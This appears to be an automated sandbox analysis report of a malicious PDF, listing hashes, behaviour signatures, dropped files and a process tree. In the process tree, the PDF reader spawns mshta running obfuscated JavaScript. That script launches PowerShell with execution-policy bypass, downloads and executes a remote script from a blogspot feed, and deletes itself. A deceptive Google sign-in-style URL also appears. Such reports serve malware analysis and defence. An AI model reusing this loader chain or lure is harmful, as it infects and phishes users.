Analysis

  • max time kernel
    117s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    07-02-2024 15:19

General

  • Target

    a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf

  • Size

    50KB

  • MD5

    feac523f300947e52e2e5ca44221d9d9

  • SHA1

    ac6dc611f760b48779bded9a5e6816c91375fd2a

  • SHA256

    a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559

  • SHA512

    53cd297d814b2e4b99926502c49a95128c1e4ed564476c8c67f19bb0d5423889a4be60384975a2d35545fdfaf21785dc2d0c9e7828a5dfac4ed988eab11ff332

  • SSDEEP

    384:86SDvX7hWFcTPm/K7Uzzzzzzzzzzzzzzzzz3SkYTZvL:86ST7hWGTO/KQ8ZvL

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2380
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2952

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    252f5497cfeac5bbcbc4a10c17941e37

    SHA1

    083e43af5860bd07ab549f8bc4421cd113b82d71

    SHA256

    aa72b5e6d65a505be7330b3e4ac21858dc141551f374271574b4134f58c7b09a

    SHA512

    dcf5a00a30a23e36be639cfbd878ec0f5e53f6601ba780e7c31b68f5f3f222a1dd21d59b288a7844c4c71614cf2bb86bfd304f60e75042cd29476d9b38495aa4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    c27afeb0bbae829db72ac30e5ba8d55c

    SHA1

    21fc03619fb367c23afd19872a25309941184035

    SHA256

    f7df667bad612c7ef970208e686a86939da936df336b48722d68829ffba57596

    SHA512

    a8ae8f1ba1140052be6817f9378d21a44cc8590e7e7172bf0da7a2d2186d47fa5c863887acad98a7e745a4c54bf60428bf299b96fd143f1f0b514ad1e0d17083

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    1552a5ea0085d32ce9b633caff6ea458

    SHA1

    eea575081698284bb1b2967a513bfa6ce343f63b

    SHA256

    91ac8d23997476df5fcc982f8336e3a275ea92aaa75faa40a9732b8e8a24749c

    SHA512

    e1089712ca43a223e8fca7b0509c09271b2f276b24d565247dfec73f05645638002b83c03b637df63e820340cb7e92da988b8261cd66c632a3dd5838c0a03abe

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    ba583ef38f6baf36e9b695be5271da1e

    SHA1

    79539f9a46efcf3237ad1edbbdb823056910fca9

    SHA256

    04629e02177e94c6d94c4f81d65731259a5610cace5d89868e528f061172849b

    SHA512

    e4e7e77a90e34efdcebe082b12f88689fb6fd50a9365f7b873fd48924f3d73c84967f26ef15799356c7c11f112ad05ff161de805afc65bff2d18d3f1922ae61a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    32841ca4fa1bc43b9bfdea0e0a809734

    SHA1

    4fd0479154ecf315bbb3c4760e520336509578b0

    SHA256

    323eb37ef5f6141f77f8a68ea3d4aa41c51cff7650c1f16b9ce2323d852fc8a9

    SHA512

    c6b74f093612d10e02bf88823dd03551d8fcdb180abfebbcdd22f780fe95cd6d632dacdf9a7c5012f5dbc022c0bc4b49560bb9aaaa685bf99ba362b13a483515

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    6f41fa6bf50428e27e18a4b73859d553

    SHA1

    5213ce7c502d6c68e058ddb820987eaa0a4ac265

    SHA256

    4e56456bbd1fa9389bab026236e25db2e10c59e095cd49097ac5c6cdb3d5bbb9

    SHA512

    ae3875aa89d1a7cd8cb91fb7b1207b6b063e8b0f7316701c684503a34ccadf8f4feb19938f4cc00505e6b03909a920b3f2949c57ea174e867d572fef6ff83d88

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    6fa1e81b3de224840b5143ceeded9e90

    SHA1

    1c0afb63b62b8c7d3440770c90524411bc2b79e7

    SHA256

    03e3221be5e5b912823cb5e3cd94912f4dc710ce3fe538625b7e9eb4e494c863

    SHA512

    fe34c907c7596103221381880de550c624204421862abc0f53685295c10bfe017f80cc0c650f49eb83ff4b0377a94a8fdd12eec94628c0ce7fba2d7ab077233b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    8f71a8d423c2947fc044cf4b4ed43f98

    SHA1

    eab2aab527b44e7cf2034ebda17b6fd848e6ab6b

    SHA256

    30ad6f585136519107bc9cccdc9d323cb103c13060d2c3534f2e0464c11aa4f5

    SHA512

    a74cec782b47373c42c6470b3e7b57914f66fd34e7b42b6d8d4d6dae888c7e2946a094368e51cd73e2a684e1d68c2834480604e4f8a54cfe3476c607560877b0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    19039e901207bdae8e1376cfe09f645d

    SHA1

    3b7d6496d545018b5582c6d9254cd2f2cbb69d50

    SHA256

    b86036abc1cc1050b9f00e714af1f3815fdc4d4c135e084be17755ed6544d1f9

    SHA512

    dc0d2303de593de3e0e8c232279f9aa475c7d39a6bac1fcc698e9dd92a768ff17d63d19fdadb3d1df6ad68f7bde48078dbb576344dcdc125a9fa8823317de872

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b501d6c97d61eab195fe4b7f1dcc09f8

    SHA1

    c4399036054545b1383e57558579fc219eb637a3

    SHA256

    7f2aa8af38f5d3b02599cec5abee04e75934013e97ba933093102377a94c216b

    SHA512

    efa02893195637ea85581a658f21d9211bf29f737901c7cdfddf3a26f77b6b6341f6bca75184ebed3e2daad2273f94e78e412879f28d3715dccf385e1bb7da28

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    5c9b1499a0a2f81923e70d1ff1b8e50c

    SHA1

    d2073a348bced4cf5b0a05c88ea56a57745ddabb

    SHA256

    0f5199d2a81ab952c75b1bb118cf60eeea68af00e21cc5bd89aa9ee0ad4088a4

    SHA512

    996a2efae7572ce5952b3ad8d0bf6a4af21843efaa6c92a1e74dba9aeaf0bbd8e15be3c32b6fcff86de7fe7257bfcc642e9ab0106fd3db75fb2ae1f79f520a02

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    0724b11ea4746fc28a6364d09304c3fb

    SHA1

    117eea326a6a37ae10064591e804e629b6be8fc5

    SHA256

    6d10b002d09babd7bdc3281fe31367fe9f89a92078d54e3afa1105c57d332029

    SHA512

    2424fcf978afcfa1eab5f57a858bdd432b9492d1a76311d6080249f90b409cbcbceed0b0dc49ab0dbb6bcc1ec43b10453f9df0904451184b73155c1fd53fd7c8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    e7a3f93d49007c771a34eaccac1c9a63

    SHA1

    82d4dd111e89a90a38ed0d4afef2968b5c3a07f6

    SHA256

    b873d365ab2528156e4f8232a46b9adde78d108951276b868445176f5747def1

    SHA512

    f3d469f829caed995832de71b76b8a398ab369f98a4351cf1058c65b9696308ce9112f6c377913f52533dff3c7659ef808fb4c252056b9239d060fe1e7f90271

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    fc0b98705430d61eb6d26c306eeadcb9

    SHA1

    c2102f9d1606733a198b2718ae31890d1dbf6977

    SHA256

    dbc35cfbe4f6b68ea8544a363a86c4e22f0aad37d6f281df572378bb28ec65b6

    SHA512

    6ebc4fd3564236326ae2b28e2df414e178e232751022e9d4a84afd51c5a69fc53ea97bbdfc59c8ec1105884b6a6987a0ea3bd814e06dd6bc6162be601726a9b2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    cc43d3ba9e35a0839c116f013b4b726e

    SHA1

    e0ad3f113f18c426cb9662b5b0a6c60e186a69d7

    SHA256

    c63609a38c78b4d1e94f462f9b1ca72d0b704655dc2850280d098eac1505c5a7

    SHA512

    8c9d2e0349cb64e59b19400e55b547fb1feb12f327b2a4b01395f916080b2d912e41d88357c03ec0baf6f4337d0c22d8784e044483be2be2cc46368cbefb27c8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    6f1b37e9aa88930e15b4aee3afc03f79

    SHA1

    be3636743e4773e342c40c2be24277b4604ce2bf

    SHA256

    af0d5f920aeed99be40e6d1aba6a7f7264a4a98c6f2b80d66e564453cb71185c

    SHA512

    4fa556f9b362947675e2dd51d59d821abbafaefbc1127fd71a3a24cea24b557ac077b00b14fc892b1303c95dc922de1edd4b48077cfc21e7f771bf744455831f

  • C:\Users\Admin\AppData\Local\Temp\CabE1CA.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\TarE4CA.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • memory/2832-2-0x000000006DE40000-0x000000006E3EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2832-3-0x000000006DE40000-0x000000006E3EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2832-4-0x0000000000250000-0x0000000000290000-memory.dmp

    Filesize

    256KB

  • memory/2832-5-0x0000000000250000-0x0000000000290000-memory.dmp

    Filesize

    256KB

  • memory/2832-83-0x000000006DE40000-0x000000006E3EB000-memory.dmp

    Filesize

    5.7MB